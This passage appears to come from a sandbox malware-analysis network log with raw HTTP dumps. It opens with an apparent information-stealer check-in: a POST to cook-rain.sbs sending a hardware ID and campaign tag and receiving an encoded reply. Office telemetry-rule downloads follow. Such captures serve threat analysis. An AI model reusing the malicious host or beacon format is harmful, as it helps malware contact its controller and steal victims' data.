                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Length: 88
                                                                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 46 35 44 32 32 38 38 35 46 32 31 41 36 46 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38
                                                                                                                                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=F5D22885F21A6F1063CFCF7E6C45F838
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC980INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:42 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=f2iv7p1k91fm8ggrn5t1iofsrm; expires=Sun, 16-Mar-2025 10:28:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QcnuLCO0jRc%2BqMKCBBQFI9y42gzwpTeM6yFJz8fMEejSF2mqWfCsBjGO9BtcL2OnI0MtqXyfsqkxDo%2Fmx0VIOVbzRFI3cYefxFfClchR63tgsgP2p1oNzu%2BEWNli4bUe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8e59e3977cfb7d14-EWR
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1877&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=985&delivery_rate=1578378&cwnd=242&unsent_bytes=0&cid=b08dfdfb6892871c&ts=601&x=0"
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC214INData Raw: 64 30 0d 0a 47 4b 6d 7a 65 76 54 4c 41 31 34 2b 77 4f 37 55 77 36 4a 70 43 52 5a 5a 69 55 50 39 6e 47 4b 42 77 47 53 6e 31 42 38 6a 2b 76 52 44 30 70 45 50 31 76 45 68 4e 6b 71 30 6e 75 36 66 6a 54 55 6d 4a 32 47 38 62 63 2b 74 56 36 2f 78 56 5a 54 36 4c 68 57 6d 32 33 66 50 31 53 62 62 72 32 59 34 45 4b 57 57 73 65 47 4f 53 32 39 69 65 37 4e 7a 30 62 34 48 6f 2f 70 56 32 76 68 6b 41 59 2f 57 49 6f 76 62 44 6f 43 37 4f 51 49 52 6e 4d 48 6c 2b 35 64 48 4f 79 64 73 70 33 4c 4d 72 30 79 77 39 6a 69 49 70 32 74 47 6d 35 6c 45 68 73 45 62 6d 71 39 73 4d 78 43 6c 6c 72 48 68 6a 6b 74 76 59 6e 75 7a 63 39 47 2b 42 36 50 36 56 64 71 4a 0d 0a
                                                                                                                                                                                                                      Data Ascii: d0GKmzevTLA14+wO7Uw6JpCRZZiUP9nGKBwGSn1B8j+vRD0pEP1vEhNkq0nu6fjTUmJ2G8bc+tV6/xVZT6LhWm23fP1Sbbr2Y4EKWWseGOS29ie7Nz0b4Ho/pV2vhkAY/WIovbDoC7OQIRnMHl+5dHOydsp3LMr0yw9jiIp2tGm5lEhsEbmq9sMxCllrHhjktvYnuzc9G+B6P6VdqJ
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      45192.168.2.74975213.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:42 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 423
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                      x-ms-request-id: 57b2d8b6-201e-0033-2767-3bb167000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164142Z-185f5d8b95csp6jmhC1NYCwy6s0000000ak0000000001aee
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      46192.168.2.74975613.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:42 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 400
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                      x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164142Z-r1d97b99577hc74hhC1TEBvbns00000008wg00000000pafw
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      47192.168.2.74975313.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:42 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 478
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                      x-ms-request-id: 70a27ff5-201e-0051-4e8c-3a7340000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164142Z-r1d97b9957747b9jhC1TEBgyec000000098000000000axr4
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      48192.168.2.74975513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:42 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 404
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                      x-ms-request-id: feb02638-401e-0067-7b8c-3a09c2000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164142Z-185f5d8b95crl6swhC1NYC3ueg0000000ap000000000e4f3
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      49192.168.2.74975413.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:42 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                      x-ms-request-id: e83eb970-001e-0046-777e-3ada4b000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164142Z-185f5d8b95c96jn4hC1NYCbgp80000000abg000000014nen
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:43 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      50192.168.2.74975913.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:44 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:44 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 479
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                      x-ms-request-id: a1d815ed-301e-0096-3f8c-3ae71d000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164144Z-185f5d8b95cdh56ghC1NYCk1x400000004ag00000000h1xv
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:45 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      51192.168.2.74976113.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:44 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:44 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 475
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                      x-ms-request-id: 7511d71d-801e-0083-6e8c-3af0ae000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164144Z-185f5d8b95c68cvnhC1NYCfn7s0000000af000000000pegy
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:45 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      52192.168.2.74976013.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:44 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:45 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 425
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                                      x-ms-request-id: 62f36519-501e-0016-468c-3a181b000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164145Z-1777c6cb7544n7p6hC1TEByvb400000009z000000000h8mv
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:45 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      53192.168.2.74976213.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:44 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
